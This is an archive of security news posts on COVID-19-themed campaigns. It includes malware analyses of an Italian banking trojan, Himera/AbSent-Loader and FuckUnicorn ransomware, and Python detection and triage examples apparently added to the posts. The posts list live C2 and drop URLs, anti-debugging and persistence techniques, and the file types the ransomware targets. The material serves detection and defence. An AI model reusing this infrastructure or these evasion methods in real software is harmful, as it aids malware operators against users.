Category Archives: coronavirus

Not all IT budgets are being cut, some are increasing

At a high level, and contrary to conventional wisdom, not all IT budgets are being cut. Even with the economic challenges that COVID-19 has posed for businesses, almost 38 percent of enterprises are keeping their IT budgets flat or actually increasing them. Yellowbrick Data received responses from more than 1,000 enterprise IT managers and executives, uncovering their infrastructure priorities during this era of economic uncertainty and disruption. “The survey brought to light some trends … More

The post Not all IT budgets are being cut, some are increasing appeared first on Help Net Security.

Facebook to verify identities on accounts that churn out viral posts

Hopefully it's a COVID-19 version of what it did post-2016 elections, when it required verification of those buying political or issue ads.

Apparently Coronavirus-tracing scammers won’t sound professional… (Yeah, right!)

Some members of the UK public will soon start receiving text messages and emails claiming to come from the NHS Test and Trace Service, as part of the country’s fight against the Coronavirus pandemic.

The problem is that many of them won’t know if the communication is genuine, or from a scammer.

And the UK Government’s advice isn’t helping.

Agile security helps software teams deliver quicker and better software

Agile adoption improves key capabilities needed to respond to current business challenges, especially those resulting from the pandemic, according to Digital.ai. With 60 percent of survey respondents saying Agile has helped increase speed to market, 41 percent agreeing they are better able to manage distributed teams, and 58 percent saying they have improved team productivity, it is clear these practices are invaluable during these challenging times. “Our all-in move to the cloud in recent years … More

The post Agile security helps software teams deliver quicker and better software appeared first on Help Net Security.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% cite proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications. Remote work and secure access concerns: when asked what their organizations are primarily concerned with securing while employees … More

The post 41% of organizations have not taken any steps to expand secure access for the remote workforce appeared first on Help Net Security.

Coronavirus-themed attacks May 24 – May 30, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 24 to May 30, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below is a list of attacks detected this week.

May 26 – Hangzhou could permanently adopt COVID-19 contact-tracing app

The City of Hangzhou is planning to make a contact tracing system developed to fight the COVID-19 pandemic permanent for its citizens.

May 27 – Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn is targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

May 29 – Himera and AbSent-Loader Leverage Covid19 lures

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

May 30 – A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

If you are interested in COVID19-themed attacks from February 1, take a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, Coronavirus themed campaigns)

The post Coronavirus-themed attacks May 24 – May 30, 2020 appeared first on Security Affairs.

A new COVID-19-themed campaign targets Italian users

Security researchers uncovered a new COVID-19-themed campaign targeting users of the National Institute for Social Security (INPS).

Security experts from D3Lab have uncovered a new COVID-19-themed phishing campaign targeting users of the Italian National Institute for Social Security (INPS). As in a previous campaign observed in early April, the threat actors set up a fake INPS site (“inps-it[.]top”) to trick victims into downloading a malicious app.

“A new phishing campaign against INPS users, similar to the previous one of April 6, 2020, has been detected in the past few hours by our research and analysis center for phishing campaigns,” reads the post published by D3Lab.

“The fraudulent activity is carried out through a web domain created ad hoc with similarities, in the name, to the official one of the national social security institution with the intent to download malware to users interested in receiving the Covid-19 allowance allocated from the Italian state.”

COVID-19 campaign INPS

D3Lab reported its findings to the Italian CERT-AGID that published a security advisory.

Cybercriminals are attempting to take advantage of the Covid-19 indemnity that the Italian government will pay to citizens who meet specific requirements.

Citizens have to request the Covid-19 indemnity from the government through the INPS portal; for this reason, the threat actors set up a fake INPS site asking visitors to download a supposed “application for the new COVID-19 indemnity”, which actually delivers a malicious APK for Android devices.

The malicious APK, named “acrobatreader.apk,” is Trojan-Banker malware that is able to monitor the actions performed by the user.

The malware asks the user to enable the Accessibility Service: abusing the legitimate functions of this service gives it much wider access to the system APIs and lets it observe and interact with other apps on the device.

“As soon as the presence of connectivity is detected, an HTTP POST request is sent to C2 through the following url “http://greedyduck[.]top/gate[.]php” passing two parameters:

  • “Action”: with botcheck or injcheck values;
  • “Data”: information collected and passed in encrypted form (RC4).”

The CERT-AGID published the Indicators of Compromise (IoCs) here.
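The beacon format in the CERT-AGID excerpt (a POST with an action of botcheck or injcheck and an RC4-encrypted data field) is enough to write a decoder for captured traffic once the RC4 key has been pulled out of the APK. What follows is an added example, not code from CERT-AGID, D3Lab or the malware itself: the key, the check-in contents, the JSON plaintext and the base64 wrapping of the data field are all constructed assumptions, and the real sample may encode the field differently. The RC4 routine is checked against a published test vector so the decoder is trustworthy before it is pointed at real captures.

```python
import base64
import json
from urllib.parse import parse_qs, urlencode

# The two action values named in the CERT-AGID advisory.
VALID_ACTIONS = {"botcheck", "injcheck"}


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encrypting and decrypting are the same XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_gate_post(body: str) -> dict:
    """Split a form-encoded gate.php body into its action and data fields."""
    fields = parse_qs(body, keep_blank_values=True)
    action = fields.get("action", [""])[0]
    if action not in VALID_ACTIONS:
        raise ValueError(f"unexpected action {action!r}")
    return {"action": action, "data": fields.get("data", [""])[0]}


def decrypt_beacon(body: str, key: bytes) -> dict:
    """Recover the plaintext check-in from a captured POST body.

    Assumption (not stated in the advisory): the RC4 output is base64-wrapped
    and the plaintext is JSON."""
    parsed = parse_gate_post(body)
    plain = rc4(key, base64.b64decode(parsed["data"]))
    return {"action": parsed["action"], "payload": json.loads(plain.decode("utf-8"))}


def build_beacon(action: str, payload: dict, key: bytes) -> str:
    """Mirror of decrypt_beacon, used only to construct the sample capture."""
    blob = base64.b64encode(rc4(key, json.dumps(payload).encode("utf-8"))).decode("ascii")
    return urlencode({"action": action, "data": blob})


# Constructed sample: a key and a check-in the real sample never contained.
SAMPLE_KEY = b"constructed-rc4-key"
SAMPLE_BODY = build_beacon(
    "botcheck",
    {"bot_id": "a1b2c3d4", "model": "constructed-phone",
     "apps": ["it.example.inps", "com.example.bank"]},
    SAMPLE_KEY,
)

if __name__ == "__main__":
    print(decrypt_beacon(SAMPLE_BODY, SAMPLE_KEY))
```

The injcheck action is parsed the same way; the payload it carries (the list of apps the bot wants overlays for) is where an analyst would look for the targeted banking packages.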

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post A new COVID-19-themed campaign targets Italian users appeared first on Security Affairs.

Himera and AbSent-Loader Leverage Covid19 Themes

Researchers at ZLab spotted a new phishing campaign using Covid19 lures to spread Himera and Absent-Loader.  

Introduction

During our Cyber Defense monitoring activities we intercepted waves of incoming emails directed at many companies under our protective umbrella. These messages leveraged FMLA (Family and Medical Leave Act) requests related to the ongoing COVID19 pandemic, and were weaponized with two versatile cyber-criminal tools: Himera and Absent-Loader.

Figure1: Email vector example

Loaders are a type of malicious code specialized in loading additional malware onto the victim’s machine. Sometimes a loader also takes on “stealer” behaviour, opportunistically gathering sensitive information even though that is not its primary role. Absent-Loader, despite its name, does exactly this. The market for stolen information is lucrative for cybercriminals: data gathered from infected systems is constantly sold in the underground, typically to other, more structured criminal organizations or even to business competitors.

Technical Analysis  

The sample used in this campaign starts from a Word document that carries an executable; that executable drops a second one and renames it to evade controls. The following picture reports the infection chain used in this campaign:

Figure 2: Infection Chain

The malicious email wave contained a .doc attachment. The static information for this file follows:

Name: Covid-19-PESANTATION.doc
Hash (MD5): 97FA1F66BD2B2F8A34AAFE5A374996F8
Threat: Himera Loader dropper
Size: 95.4 KB (97,745 bytes)
Filetype: Microsoft Word document
Ssdeep: 1536:7fVmPSiRO8cOV8xCcoHrZvIdTZ2DSXMqcI3iL5PEs8VlbeH0btGDYLlNq2l+SEg:7fVz8zyUHlvId7H3iL5MVlbeHGkQvqTU

Table 1: Static information about the Malicious document

The interesting feature of this document is that it does not use any macro or exploit: it contains the entire executable as an embedded object, and the user is lured into double-clicking the icon that represents the executable.

Once clicked, the embedded object runs a malicious file named HimeraLoader.exe.

Name: HimeraLoader.exe
Hash (MD5): 4620C79333CE19E62EFD2ADC5173B99A
Threat: Second stage dropper
Size: 143 KB (146,944 bytes)
Filetype: Executable
File Info: Microsoft Visual C++ 8
Ssdeep: 3072:jqW9iAayyenylzx0/2gJUSUZsnOA/TtYLeEoWj5PxJhQQeSH1pNGmHohurCMSiBf:jqW9iAayyenylzx0/2gJUSUZsnJ/TKLd

Table 2: Static information about the HimeraLoader executable

Inspecting the execution trace of HimeraLoader.exe, we noticed a distinctive mutex (Mutant object) named “HimeraLoader v1.6”, created during the initial loading of the malicious code; a name this specific is a convenient host-based indicator.

Figure 3: Himera Loader Mutex

The sample also performs some classic anti-analysis tricks using Windows APIs such as IsDebuggerPresent, IsProcessorFeaturePresent and GetStartupInfoW, and execution takes a different path through the program if a debugger is detected. GetStartupInfoW retrieves the contents of the STARTUPINFO structure that was specified when the calling process was created; it takes a pointer to a STARTUPINFO structure that receives the startup information and returns no value.

Figure 4: Relevant strings of the Loader

Once Himera Loader gets through its anti-analysis checks, it downloads a second binary from hxxp://195[.]2[.]92[.]151/ad/da/drop/smss[.]exe. The remote server is operated by Hosting Technologies LLC, the company behind the Russian hosting brand “VDSina.ru”.

The AbSent-Loader 

The file downloaded from the drop URL has the following static information:

Name: smss[1].exe
Hash (MD5): 4D2207059FE853399C8F2140E63C58E3
Threat: Dropper/Injector
Size: 0.99 MB (1,047,040 bytes)
Filetype: Executable
File Info: Microsoft Visual C++ 8
Ssdeep: 24576:+9d+UObalbls+rcaN+cFsyQIDHx2JrjDwc9bmfRiHwl:+9d+UObaVzrcaN+cKypDHx2Jr/wYbmJd

Table 3: Static information about the AbsentLoader Payload

When smss.exe is executed, it copies itself to a new file, winsvchost.exe, in the %TEMP% folder and creates a scheduled task to maintain persistence across reboots.

Figure 5: Evidence of the Scheduled Task

The malware also adopts some interesting anti-debug techniques, such as the GetTickCount check, which is similar to the one described in one of our previous reports. GetTickCount is called twice: after the “call eax” instruction, the result of the first call is subtracted from the result of the second and the difference is left in the EAX register. A delta larger than normal execution would produce reveals that the code was paused or single-stepped under a debugger.

Figure 6: GetTickCount anti-debug Technique

The malware then opens a TCP connection every 15 minutes to the same remote host operated by Hosting Technologies LLC (195.2.92.151), this time sending HTTP POST requests to the “/ad/da/gate.php” resource.

Figure 7: Evidence of some relevant strings inside the payload

This payload is a new version of AbSent-Loader, a piece of malware that, despite its name, also behaves like a bot: it lacks most modern advanced features but is sophisticated enough to maintain persistence on the victim host and to escalate the attack with follow-up malware implants.
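The 15-minute POST cadence to /ad/da/gate.php described above is exactly the regularity a proxy log exposes, and it survives even when the destination changes. The following is an added example and not part of the ZLab analysis: it groups requests per client and destination, measures the gaps between consecutive requests and flags any series whose gaps are all close to the median, which is a timer firing rather than a person browsing. The one-line log format (timestamp, client, method, URL, status) and the log lines themselves are constructed for the example; the flagged destination reuses the IP and path reported in the analysis.

```python
from collections import defaultdict
from datetime import datetime, timezone
from statistics import median
from urllib.parse import urlsplit


def parse_line(line: str):
    """One constructed proxy record: ISO timestamp, client, method, URL, status."""
    ts, client, method, url, _status = line.split()
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    parts = urlsplit(url)
    return when, client, method, parts.hostname, parts.path


def find_beacons(lines, min_hits: int = 4, max_jitter: float = 0.1):
    """Flag (client, method, host, path) series whose inter-request gaps are
    all within max_jitter (a fraction) of the median gap."""
    series = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        when, client, method, host, path = parse_line(line)
        series[(client, method, host, path)].append(when)

    findings = []
    for (client, method, host, path), times in series.items():
        if len(times) < min_hits:
            continue                           # too few points to call it periodic
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if period <= 0:
            continue                           # bursts, not a timer
        jitter = max(abs(g - period) for g in gaps) / period
        if jitter <= max_jitter:
            findings.append({"client": client, "method": method, "host": host,
                             "path": path, "period_s": period, "hits": len(times)})
    return findings


# Constructed sample log: one infected host checking in every ~15 minutes with a
# few seconds of jitter, plus ordinary browsing to the same page at random times.
SAMPLE_LOG = """
2020-05-29T10:00:03Z 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-29T10:02:00Z 10.0.0.12 GET http://www.example.com/feed 200
2020-05-29T10:03:30Z 10.0.0.12 GET http://www.example.com/feed 200
2020-05-29T10:15:05Z 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-29T10:30:01Z 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-29T10:41:00Z 10.0.0.12 GET http://www.example.com/feed 200
2020-05-29T10:45:04Z 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-29T11:00:02Z 10.0.0.12 POST http://195.2.92.151/ad/da/gate.php 200
2020-05-29T11:20:00Z 10.0.0.12 GET http://www.example.com/feed 200
2020-05-29T11:21:00Z 10.0.0.7 GET http://cdn.example.net/lib.js 200
"""

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG.splitlines()):
        print(hit)
```

The jitter threshold is the knob to tune: loaders that sleep for a fixed interval plus request latency land well under 10 percent, while anything a human drives will not. Pair the hit with the scheduled task and the %TEMP%\winsvchost.exe copy described above when triaging the host.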

Conclusion

The attack we intercepted and described here is a clear example of the new threats emerging in cyberspace during these months: new criminal threat actors whose sole objective is to profit from the emotional reactions of people working to keep the economic fabric alive and running to support the Covid19 response.

In this particular period, cyberspace is becoming more and more risky for companies and individuals. Cybercrime rose during the lockdowns, and these malicious actors are using every possible medium to make money at the expense of companies and organizations. For this reason, we strongly advise companies to adapt and strengthen their cyber security perimeter to withstand the new volumes and types of attacks we are experiencing these days.

Indicators of Compromise (IoCs) and Yara rules are available here:

Pierluigi Paganini

(SecurityAffairs – COVID19, hacking)

The post Himera and AbSent-Loader Leverage Covid19 Themes appeared first on Security Affairs.

How to protect your business from COVID-19-themed vishing attacks

Cybercriminals have been using the COVID-19 pandemic as a central theme in all kinds of crisis-related email phishing campaigns. But because of the dramatic rise in the number of at-home workers, one method that has become increasingly common over the past few months is vishing, i.e., phishing executed via phone calls. Rising success rates are the reason why vishing has become more common, and there are several factors driving this trend: People are … More

The post How to protect your business from COVID-19-themed vishing attacks appeared first on Help Net Security.

Remote work and the threat landscape

Last month, after the dust had settled from the move from office to remote work, we took a look at ways you could improve your security posture. In it, we discussed how you can shore up older and personal devices now being used for work tasks, how to reduce your security footprint with company-sanctioned software, and ways to ensure that connections back into the company network are secure.

This month, we decided to take a look at some of the trends we’ve seen in the shifting threat landscape, including attackers who are adapting their techniques to take advantage of new opportunities. When you understand what they’re doing, it’s easier to mount a better defense against new trends in the threat landscape.

The great migration  

Before diving into what attackers are up to, let’s take a look at just how significant the shift to remote work has been. To do this, we took a look at traffic running through Cisco Umbrella’s DNS servers to see where it was coming from, giving us a snapshot of internet activity. In particular, we looked at distinct IP addresses, sorting them into remote and office groupings. The following chart shows the trend for the total number of IP addresses known to be remote each week.

Figure 1 Volume of remote workers seen in Umbrella DNS traffic

In mid-March, we can see a marked increase in remote connections. While it’s interesting to note an inverse correlation between office-based connections to Umbrella (declining) and remote connections (increasing), even more interesting is by how much remote connections increased.  

Comparing the first and last weeks of March, the number of remote workers had effectively doubled. This means that IT teams have been dealing with setting up a lot of remote workers.  This can potentially spread resources thin and, given the number of new remote connections, requires attention to look out for threats in this expanded environment. (Note: new Umbrella customers who have recently signed up to our Umbrella trial have been filtered out in the above chart.) 

A topical shift in spam 

It’s not news that spammers leverage the latest big stories in their emails in order to help spread their wares. The pandemic has been no exception. As reported by Talos on a number of occasions, threat actors have used it in a wide variety of malicious campaigns.

Some campaigns have sent out malicious emails that appear to share government information on the pandemic, while others claim to contain information regarding government stimulus payments. This shift to pandemic-related campaigns is so pronounced that malicious spam campaigns focusing on package delivery have pivoted to claim that deliveries have been postponed due to the pandemic:

Figure 2 Package delivery spam with pandemic theme

What’s interesting is not just the variety of email scams and tricks being peddled on the threat landscape, but the volume of pandemic-related spam campaigns. To determine just how much spam contained pandemic-based themes, Talos looked at distinct emails sent out that contained the terms “pandemic,” “COVID-19,” and “corona.” 

Figure 3 Percent of observed emails tracked by Talos containing pandemic themes

While emails containing these key words first began to grow in early February, there is a clear increase in mid-March, when the pandemic was constantly in the headlines and coinciding with the migration to remote work discussed above. At its peak, more than 20 percent of all email observed by Talos referenced the pandemic. (Note: the regular dips in the chart coincide with weekends. It’s also worth noting that a portion of ham or marketing emails were also mentioning the pandemic during this time.) 

Malicious domains 

In early April, researchers from Umbrella took a look at the increase in malicious domains that bad actors were leveraging to carry out attacks. According to Umbrella researchers, on March 19th, enterprise customers connected to 47,059 domains that contain “covid” or “corona” in the name. Of these, four percent were blocked as malicious.

We decided to revisit this data to see what has happened two months later. By May 19th, this number had increased to 71,286 domains, 34 percent of which were blocked as malicious.

Figure 4 Percentage of pandemic-related domains flagged as malicious

Despite this being a marked increase from March, late April appears to be the point where the most malicious activity took place. During this time the percentage of domains blocked as malicious frequently crossed 50 percent, even peaking as high as 75 percent. While this declined in early May, the percentage of malicious domains regularly sat between 30-40 percent in mid- to late-May.  
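The Umbrella figures above (the share of queried “covid”/“corona” domains and the fraction of those that were blocked, tracked by date) can be reproduced from any DNS-layer log that records the queried name and the verdict. The following is an added example and not Cisco code: it counts distinct domains per day, as the Umbrella numbers do, rather than raw query volume, so a single domain hammered by many clients does not skew the ratio. The record format (timestamp, client, queried name, verdict) and the lines are constructed for the example and use the reserved .example TLD.

```python
import re
from collections import defaultdict

# Same keyword filter the Umbrella researchers applied to domain names.
PANDEMIC_THEME = re.compile(r"covid|corona", re.IGNORECASE)


def parse_record(line: str):
    """Constructed DNS-layer record: ISO timestamp, client IP, queried name, verdict."""
    ts, client, name, verdict = line.split()
    return ts[:10], client, name.rstrip(".").lower(), verdict.upper()


def pandemic_domain_stats(lines) -> dict:
    """Per day: distinct themed domains, their share of all distinct domains,
    and the share of themed domains that were blocked."""
    days = defaultdict(lambda: {"all": set(), "themed": set(), "blocked": set()})
    for line in lines:
        if not line.strip():
            continue
        day, _client, name, verdict = parse_record(line)
        bucket = days[day]
        bucket["all"].add(name)                       # distinct names, not query volume
        if PANDEMIC_THEME.search(name):
            bucket["themed"].add(name)
            if verdict == "BLOCKED":
                bucket["blocked"].add(name)
    report = {}
    for day, b in sorted(days.items()):
        themed, total = len(b["themed"]), len(b["all"])
        report[day] = {
            "themed_domains": themed,
            "themed_share_pct": round(100.0 * themed / total, 1) if total else 0.0,
            "themed_blocked_pct": round(100.0 * len(b["blocked"]) / themed, 1) if themed else 0.0,
        }
    return report


# Constructed sample: two days, with one themed domain queried twice on the first
# day to show that the distinct-domain count is what drives the ratios.
SAMPLE_DNS_LOG = """
2020-03-19T09:12:01Z 10.1.1.5 covid19-relief.example. BLOCKED
2020-03-19T09:12:40Z 10.1.1.9 covid19-relief.example. BLOCKED
2020-03-19T09:15:22Z 10.1.1.5 coronavirus-update.example. ALLOWED
2020-03-19T10:01:09Z 10.1.1.7 bank.example. ALLOWED
2020-03-19T10:30:00Z 10.1.1.7 mail.example. ALLOWED
2020-05-19T08:00:13Z 10.1.1.5 covid-cure.example. BLOCKED
2020-05-19T08:05:44Z 10.1.1.9 corona-test-kit.example. BLOCKED
2020-05-19T08:07:10Z 10.1.1.7 covid19-news.example. ALLOWED
2020-05-19T09:00:00Z 10.1.1.7 intranet.example. ALLOWED
"""

if __name__ == "__main__":
    for day, stats in pandemic_domain_stats(SAMPLE_DNS_LOG.splitlines()).items():
        print(day, stats)
```

The keyword match is deliberately loose (it also catches names like “coronado”), which is fine for trend measurement but not for blocking; the verdict column, not the keyword, is what says a domain was malicious.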

Protect against the trends 

Overall, bad actors have upped their activity with pandemic-related themes surrounding malicious spam and domains. The good news is that the systems required to protect your organization from these security risks haven’t shifted much.

For starters, Cisco Umbrella’s cloud-based services can protect users from malicious internet destinations. The malicious domains that have been registered in the last few months are all flagged as malicious within Umbrella’s DNS infrastructure, preventing users within your organization from connecting to them and becoming compromised.

Similarly, Cisco Email Security is well equipped to identify and filter the influx of pandemic-related spam aimed at your users’ inboxes. Its advanced phishing protections and machine learning capabilities can quickly identify these malicious spam campaigns, not just by topic but by understanding and authenticating email identities and behavioral relationships, filtering out spam emails and preventing attacks.

Also, as we discussed last month, Cisco has expanded and extended trial offerings on a number of security products. Umbrella has one such offering, as does AMP for Endpoints, which can be used to secure the additional remote desktops now on the company network. AMP can help you gain visibility and control of remote devices, allowing you to see where a threat came from, where it’s been, what it’s doing, and if necessary, isolate compromised endpoints.

Finally, to secure that remote connection back into the company network, consider using Cisco AnyConnect Secure Mobility Client with Duo Security. AnyConnect can simplify secure access to the company network, while Duo can ensure that the person logging into your network is who they say they are.  

Free and expanded offerings for Umbrella, AMP, AnyConnect, and Duo are all available through our Cisco Secure Remote Worker page. 


The post Remote work and the threat landscape appeared first on Cisco Blogs.

Solving the security challenges of remote working

Unprecedented times call for unprecedented actions and the ongoing COVID-19 pandemic has caused what is likely to be the biggest shift towards remote working that the world has ever seen. But, while the technology has been around for quite some time, recent events demonstrate just how few businesses are capable of switching from an office-based setup to a remote one in a fast, secure, and non-disruptive manner. There’s a significant number of reasons why it … More

The post Solving the security challenges of remote working appeared first on Help Net Security.

External attacks on cloud accounts grew 630 percent from January to April

The McAfee report uncovers a correlation between the increased use of cloud services and collaboration tools, such as Cisco WebEx, Zoom, Microsoft Teams and Slack, during the COVID-19 pandemic and an increase in cyber attacks targeting the cloud. There are significant and potentially long-lasting trends that include an increase in the use of cloud services, access from unmanaged devices and the rise of cloud-native threats. These trends emphasize the need for new security delivery … More

The post External attacks on cloud accounts grew 630 percent from January to April appeared first on Help Net Security.

Fuckunicorn ransomware targets Italy in COVID-19 lures

A new piece of ransomware dubbed FuckUnicorn is targeting Italy by tricking victims into downloading a fake COVID-19 contact tracing app.

A new ransomware dubbed FuckUnicorn has been targeting computers in Italy by tricking victims into downloading a fake contact tracing app, named Immuni, that promises to provide real-time updates for the COVID-19 outbreak.

The COVID-19-themed campaign uses messages that pretend to come from the Italian Pharmacist Federation (FOFI).

The Italian Computer Emergency Response Team of the AgID agency (CERT-AgID) released an advisory about this threat.

Attackers attempt to take advantage of the interest on the contact tracing app Immuni that was chosen by the Italian government to trace the evolution of the pandemic in the country.

The new ransomware was first spotted by the malware researcher JamesWT_MHT, who shared samples with the malware research community.

The email messages used as a lure are written in Italian and inform citizens of a beta release of the Immuni app for PC.

The campaign targeted pharmacies, universities, doctors, and other entities involved in the fight against COVID-19 outbreak.

To trick victims into downloading the malicious app, the threat actors set up a malicious domain that clones the content of the legitimate site of the Federazione Ordini Farmacisti Italiani (fofi.it).

The attackers registered the lookalike domain “fofl.it” (a lowercase L standing in for the i of fofi.it) to trick victims.

The content of the email includes download links and contact information that combines email addresses from the attacker and FOFI.

Upon executing the malware it displays a fake Coronavirus Map from the Center for Systems Science and Engineering at Johns Hopkins University.

In the background, FuckUnicorn starts encrypting data on the system: it encrypts files in certain user folders (Desktop, Links, Contacts, Documents, Downloads, Pictures, Music, OneDrive, Saved Games, Favorites, Searches, and Videos) that have one of these extensions:

.txt, .jar, .exe, .dat, .contact, .settings, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .py, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .htm, .xml, .psd, .pdf, .dll, .c, .cs, .mp3, .mp4, .f3d, .dwg, .cpp, .zip, .rar, .mov, .rtf, .bmp, .mkv, .avi, .apk, .lnk, .iso, .7-zip, .ace, .arj, .bz2, .cab, .gzip, .lzh, .tar, .uue, .xz, .z, .001, .mpeg, .mp3, .mpg, .core, .crproj, .pdb, .ico, .pas, .db, .torrent

The malicious code appends the “.fuckunicornhtrhrtjrjy” extension to the names of encrypted files.

FuckUnicorn drops a ransom note written in Italian that asks victims to pay EUR 300 worth of Bitcoin within three days or lose their data.

The email address in the ransom note is invalid making it impossible to send the attacker the payment proof.

At the time of writing, no transactions were recorded for the wallet included in the ransom note.

The good news for victims is that CERT-AgID discovered that the password used to encrypt the files is sent to the attacker in clear text, which means it can be recovered from captured network traffic.
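Knowing the targeted folders, the targeted extensions and the appended extension is enough for a responder to inventory what the ransomware touched and what it would have reached. The following is an added example and not code from CERT-AgID or the FuckUnicorn analysis: it scans a user profile for the .fuckunicornhtrhrtjrjy suffix, maps each hit back to its original name for later restoration once the key has been pulled from the traffic capture, and lists targeted files that were left untouched (a sign that encryption was interrupted). The profile tree is constructed in a temporary directory for the example, and TARGET_EXTS carries only a subset of the extension list above.

```python
import tempfile
from pathlib import Path

RANSOM_SUFFIX = ".fuckunicornhtrhrtjrjy"
# Top-level profile folders the ransomware walks, per the CERT-AgID analysis.
TARGET_DIRS = {"Desktop", "Links", "Contacts", "Documents", "Downloads", "Pictures",
               "Music", "OneDrive", "Saved Games", "Favorites", "Searches", "Videos"}
# Subset of the targeted extensions listed above; extend as needed.
TARGET_EXTS = {".txt", ".jar", ".exe", ".doc", ".docx", ".xlsx", ".pdf",
               ".jpg", ".png", ".zip", ".sql", ".py", ".db"}


def triage(profile_root) -> dict:
    """Walk a user profile and separate encrypted files from targeted-but-untouched ones."""
    root = Path(profile_root)
    encrypted, untouched = [], []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        in_scope = rel.parts[0] in TARGET_DIRS       # only the listed top-level folders
        if path.name.endswith(RANSOM_SUFFIX):
            original = path.name[:-len(RANSOM_SUFFIX)]
            encrypted.append((rel.as_posix(), original))
        elif in_scope and path.suffix.lower() in TARGET_EXTS:
            untouched.append(rel.as_posix())
    return {"encrypted": sorted(encrypted), "untouched_targets": sorted(untouched)}


def build_sample_profile() -> str:
    """Constructed profile: two encrypted files, two targets left alone, and one
    .db under AppData that the ransomware's folder list never reaches."""
    root = Path(tempfile.mkdtemp(prefix="fu_triage_"))
    sample = {
        "Documents/report.docx" + RANSOM_SUFFIX: b"\x00ciphertext",
        "Documents/notes.txt": b"plain text, not yet encrypted",
        "Downloads/setup.exe" + RANSOM_SUFFIX: b"\x00ciphertext",
        "Pictures/holiday.jpg": b"\xff\xd8\xff",
        "AppData/Local/cache.db": b"SQLite format 3\x00",
    }
    for rel, content in sample.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)
    return str(root)


if __name__ == "__main__":
    print(triage(build_sample_profile()))
```

Run it against a copy of the profile, never the live one: the original names it recovers are the restore targets, and the untouched list tells you how far the encryption loop got before it stopped.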

Pierluigi Paganini

(SecurityAffairs – FuckUnicorn, hacking)

The post Fuckunicorn ransomware targets Italy in COVID-19 lures appeared first on Security Affairs.

Patented algorithms predict, identify, diagnose and prevent abnormalities in complex systems

The COVID-19 pandemic has forced public health, supply chain, transportation, government, economic and many other entities to interact in real time. One of the challenges in large systems interacting in this way is that even tiny errors in one system can cause devastating effects across the entire system chain. Now, Purdue University innovators have come up with a possible solution: a set of patented algorithms that predict, identify, diagnose and prevent abnormalities in large and … More

The post Patented algorithms predict, identify, diagnose and prevent abnormalities in complex systems appeared first on Help Net Security.

Global DX spending to grow 10.4% in 2020

Spending on the digital transformation (DX) of business practices, products, and organizations will continue at a solid pace despite the challenges presented by the COVID-19 pandemic, IDC reveals. Global spending on DX technologies and services is forecast to grow 10.4% in 2020 to $1.3 trillion. While this is notably slower than the 17.9% growth in 2019, it remains one of the few bright spots in a year characterized by dramatic reductions in overall technology spending. … More

The post Global DX spending to grow 10.4% in 2020 appeared first on Help Net Security.

Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide; experts are observing new campaigns on a daily basis.

Below is a list of attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 17 – May 23, 2020 appeared first on Security Affairs.

Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

Researchers from Vipre Labs observed a spike in the use of GuLoader in COVID-19-themed campaigns since March 2020.


The discovery confirms that crooks continue to use COVID-19 lures in malspam campaigns. In the campaign monitored by Vipre Labs, attackers used spam email samples containing GuLoader.

GuLoader is a popular downloader that appeared in the threat landscape in 2019 and has been involved in other COVID-19 campaigns; it is written in VB5/6 and distributed compressed in a .rar or .iso file.

GuLoader is usually employed in spam campaigns using bill payments, wire transfers or COVID lures.

In the last campaign observed by experts, the downloader utilizes cloud hosting services to keep the payload encrypted.

